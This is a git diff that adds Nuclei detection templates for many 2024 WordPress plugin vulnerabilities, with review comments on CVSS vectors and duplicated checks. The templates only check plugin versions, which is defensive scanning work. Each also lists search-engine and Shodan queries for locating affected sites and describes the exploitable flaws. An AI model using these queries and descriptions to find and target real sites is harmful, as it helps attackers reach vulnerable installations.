google-query: inurl:"/wp-content/plugins/visualmodo-elements/" + shodan-query: 'vuln:CVE-2024-11095' + tags: cve,wordpress,wp-plugin,visualmodo-elements,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visualmodo-elements/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visualmodo-elements" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11107.yaml b/poc/cve/CVE-2024-11107.yaml new file mode 100644 index 0000000000..9f2095a413 --- /dev/null +++ b/poc/cve/CVE-2024-11107.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11107-eedf99f3343eab66ce27c56f82118688 + +info: + name: > + System Dashboard <= 2.8.14 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The System Dashboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.8.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ed6c1c2-8fbd-4bcb-854a-492d1060364b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-11107 + metadata: + fofa-query: "wp-content/plugins/system-dashboard/" + google-query: inurl:"/wp-content/plugins/system-dashboard/" + shodan-query: 'vuln:CVE-2024-11107' + tags: cve,wordpress,wp-plugin,system-dashboard,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/system-dashboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "system-dashboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11140.yaml b/poc/cve/CVE-2024-11140.yaml new file mode 100644 index 0000000000..e33cf8a37d --- /dev/null +++ b/poc/cve/CVE-2024-11140.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11140-59c50b763fa3b85c4c06d48cf812f8e0 + +info: + name: > + Real WP Shop Lite Ajax eCommerce Shopping Cart <= 2.0.8 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Real WP Shop Lite Ajax eCommerce Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dd75955-3c9e-4cac-b952-f705a2129707?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-11140 + metadata: + fofa-query: "wp-content/plugins/real-wp-shop-lite/" + google-query: inurl:"/wp-content/plugins/real-wp-shop-lite/" + shodan-query: 'vuln:CVE-2024-11140' + tags: cve,wordpress,wp-plugin,real-wp-shop-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/real-wp-shop-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "real-wp-shop-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.8') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11183.yaml b/poc/cve/CVE-2024-11183.yaml new file mode 100644 index 0000000000..488a15e1b4 --- /dev/null +++ b/poc/cve/CVE-2024-11183.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11183-740e0e624799af0f29235cfe4c93224c + +info: + name: > + Simple Side Tab <= 2.1.14 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Simple Side Tab plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.1.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4555b16b-dd30-494b-ada9-33006cd729cf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-11183 + metadata: + fofa-query: "wp-content/plugins/simple-side-tab/" + google-query: inurl:"/wp-content/plugins/simple-side-tab/" + shodan-query: 'vuln:CVE-2024-11183' + tags: cve,wordpress,wp-plugin,simple-side-tab,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-side-tab/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-side-tab" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11190.yaml b/poc/cve/CVE-2024-11190.yaml new file mode 100644 index 0000000000..6cf20762f6 --- /dev/null 
+++ b/poc/cve/CVE-2024-11190.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11190-815c4afdf39ca536261160cd80e26e43 + +info: + name: > + jwp-a11y <= 4.1.7 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The jwp-a11y plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d0da23a-12e6-4e57-8413-dc86a62b1800?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-11190 + metadata: + fofa-query: "wp-content/plugins/jwp-a11y/" + google-query: inurl:"/wp-content/plugins/jwp-a11y/" + shodan-query: 'vuln:CVE-2024-11190' + tags: cve,wordpress,wp-plugin,jwp-a11y,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jwp-a11y/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jwp-a11y" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11221.yaml b/poc/cve/CVE-2024-11221.yaml new file mode 100644 index 0000000000..17e313474a --- /dev/null 
+++ b/poc/cve/CVE-2024-11221.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11221-fd998e8034a09be96ea1e90e75cb53d4 + +info: + name: > + Full Screen (Page) Background Image Slideshow <= 1.1 Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Full Screen (Page) Background Image Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bf2ffdb1-fe10-475b-9c05-553a95d7b3bc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-11221 + metadata: + fofa-query: "wp-content/plugins/full-screen-page-background-image-slideshow/" + google-query: inurl:"/wp-content/plugins/full-screen-page-background-image-slideshow/" + shodan-query: 'vuln:CVE-2024-11221' + tags: cve,wordpress,wp-plugin,full-screen-page-background-image-slideshow,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/full-screen-page-background-image-slideshow/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "full-screen-page-background-image-slideshow" + part: body + + - type: dsl + dsl: + - 
compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11275.yaml b/poc/cve/CVE-2024-11275.yaml new file mode 100644 index 0000000000..99188a12f0 --- /dev/null +++ b/poc/cve/CVE-2024-11275.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11275-206acacc954728d70b76a3dfcd2a713b + +info: + name: > + WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin <= 1.0.27 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Deletion + author: topscoder + severity: low + description: > + The WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the /wp-json/timetics/v1/customers/ REST API endpoint in all versions up to, and including, 1.0.27. This makes it possible for authenticated attackers, with Timetics Customer access and above, to delete arbitrary users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d68e250e-d850-4100-81db-3e3c48a3a4a1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-11275 + metadata: + fofa-query: "wp-content/plugins/timetics/" + google-query: inurl:"/wp-content/plugins/timetics/" + shodan-query: 'vuln:CVE-2024-11275' + tags: cve,wordpress,wp-plugin,timetics,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/timetics/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "timetics" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.27') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93.yaml b/poc/cve/CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93.yaml new file mode 100644 index 0000000000..11f6183cbc 
--- /dev/null +++ b/poc/cve/CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93 + +info: + name: > + Smoove connector for Elementor forms <= 4.1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Smoove connector for Elementor forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8129bc3a-41c9-4a1e-8e04-55e23bb8d46d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11367 + metadata: + fofa-query: "wp-content/plugins/smoove-elementor/" + google-query: inurl:"/wp-content/plugins/smoove-elementor/" + shodan-query: 'vuln:CVE-2024-11367' + tags: cve,wordpress,wp-plugin,smoove-elementor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smoove-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smoove-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11372.yaml b/poc/cve/CVE-2024-11372.yaml new file mode 100644 index 0000000000..4850f49445 --- /dev/null 
+++ b/poc/cve/CVE-2024-11372.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11372-19add4c9d86c1440f92c818767e272d4 + +info: + name: > + Connexion Logs <= 3.0.2 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The Connexion Logs plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/699fc7f8-ed1f-465c-be37-f27a9dd74076?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-11372 + metadata: + fofa-query: "wp-content/plugins/logs-de-connexion/" + google-query: inurl:"/wp-content/plugins/logs-de-connexion/" + shodan-query: 'vuln:CVE-2024-11372' + tags: cve,wordpress,wp-plugin,logs-de-connexion,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/logs-de-connexion/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "logs-de-connexion" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11373.yaml b/poc/cve/CVE-2024-11373.yaml new file mode 100644 index 0000000000..6f766b3f3c --- /dev/null +++ b/poc/cve/CVE-2024-11373.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11373-b5dca7f583f1b8366026d4d92294f88d + +info: + name: > + Connexion Logs <= 3.0.2 - Cross-Site Request Forgery to Log Deletion + author: topscoder + severity: medium + description: > + The Connexion Logs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to delete logs via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef0abec6-7d4b-4a1f-8116-e31d60bc34b0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-11373 + metadata: + fofa-query: "wp-content/plugins/logs-de-connexion/" + google-query: inurl:"/wp-content/plugins/logs-de-connexion/" + shodan-query: 'vuln:CVE-2024-11373' + tags: cve,wordpress,wp-plugin,logs-de-connexion,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/logs-de-connexion/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "logs-de-connexion" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml b/poc/cve/CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml new file mode 100644 index 0000000000..9f26c0becf --- /dev/null +++ b/poc/cve/CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml 
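Review bot: `cvss-metrics` here carries `UI:N` (score 5.3), but the description says the request only succeeds if a site administrator is tricked into an action such as clicking a link, which is user interaction. The other CSRF template in this patch, CVE-2024-11417, uses `UI:R` for the same precondition. The vector presumably comes unchanged from the upstream feed, so it is worth checking against the referenced Wordfence advisory before relying on the score. If it is kept as published, a comment such as `# vector as published upstream; description implies UI:R` would stop it being taken at face value.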
@@ -0,0 +1,59 @@ +id: CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c + +info: + name: > + dejure.org Vernetzungsfunktion <= 1.97.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The dejure.org Vernetzungsfunktion plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.97.5. This is due to missing or incorrect nonce validation on the djo_einstellungen_menue() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bfe35762-2cb1-4b62-8865-ab217ff29450?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11417 + metadata: + fofa-query: "wp-content/plugins/dejureorg-vernetzungsfunktion/" + google-query: inurl:"/wp-content/plugins/dejureorg-vernetzungsfunktion/" + shodan-query: 'vuln:CVE-2024-11417' + tags: cve,wordpress,wp-plugin,dejureorg-vernetzungsfunktion,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/dejureorg-vernetzungsfunktion/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "dejureorg-vernetzungsfunktion" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.97.5') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11462-8df69847f3be73a75d55847984a2d955.yaml b/poc/cve/CVE-2024-11462-8df69847f3be73a75d55847984a2d955.yaml new file mode 100644 index 0000000000..e06cece275 --- /dev/null +++ b/poc/cve/CVE-2024-11462-8df69847f3be73a75d55847984a2d955.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11462-8df69847f3be73a75d55847984a2d955 + +info: + name: > + Filestack Official <= 2.0.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Filestack Official plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'fstab' and 'filestack_options' parameters in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/559a94d8-527d-48b3-a917-461ebfa012bc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11462 + metadata: + fofa-query: "wp-content/plugins/filestack-upload/" + google-query: inurl:"/wp-content/plugins/filestack-upload/" + shodan-query: 'vuln:CVE-2024-11462' + tags: cve,wordpress,wp-plugin,filestack-upload,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/filestack-upload/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "filestack-upload" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11502.yaml b/poc/cve/CVE-2024-11502.yaml new file mode 100644 index 0000000000..a49cd7b211 --- /dev/null +++ b/poc/cve/CVE-2024-11502.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11502-e69268cf79e16efe674087f9897a7a26 + +info: + name: > + Planning Center Online Giving <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + The Planning Center Online Giving plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb991940-b4ed-4b64-be59-afe37eaf3a2c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11502 + metadata: + fofa-query: "wp-content/plugins/planning-center-online-giving/" + google-query: inurl:"/wp-content/plugins/planning-center-online-giving/" + shodan-query: 'vuln:CVE-2024-11502' + tags: cve,wordpress,wp-plugin,planning-center-online-giving,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/planning-center-online-giving/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "planning-center-online-giving" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1.yaml b/poc/cve/CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1.yaml new file mode 100644 index 0000000000..c1bdd45dd2 --- /dev/null +++ b/poc/cve/CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1 + +info: + name: > + WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'fieldfor', 'visibleParent' and 'id' parameters in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80fcaea8-5837-4d8c-afef-b9ed4fd31227?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-11710 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11710' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file 
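Review bot: This template and the five that follow for the same plugin (CVE-2024-11711, -11712, -11713, -11714 and -11715) send the identical readme.txt request with the same `wp-job-portal` word matcher and differ only in metadata and the version bound (`<= 2.2.2`, or `<= 2.2.1` for CVE-2024-11711). One outdated install therefore yields up to six findings from a single piece of evidence, which inflates counts in reports and hides the fact that one plugin update remediates all of them. A comment in each file such as `# shares its readme.txt version check with CVE-2024-11710..11715; one install produces several findings` would make that visible to whoever triages the output. Grouping the CVE ids under one version check per plugin would avoid the duplication, if the generator allows it.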
diff --git a/poc/cve/CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e.yaml b/poc/cve/CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e.yaml new file mode 100644 index 0000000000..37faf0ff16 --- /dev/null +++ b/poc/cve/CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e + +info: + name: > + WP Job Portal <= 2.2.1 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'resumeid' parameter in all versions up to, and including, 2.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d8961fd-68ac-4a10-ab26-cfcda27c18e8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-11711 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11711' + tags: cve,wordpress,wp-plugin,wp-job-portal,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47.yaml b/poc/cve/CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47.yaml new file mode 100644 index 0000000000..c4d5bee4a5 --- /dev/null +++ b/poc/cve/CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47 + +info: + name: > + WP Job Portal <= 2.2.2 - Missing Authorization to Unauthenticated Arbitrary Resume Download + author: topscoder + severity: high + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the getResumeFileDownloadById() function in all versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to download other users resumes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc87d5f-dba4-40f8-946f-f2634614b579?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-11712 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11712' + tags: cve,wordpress,wp-plugin,wp-job-portal,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" 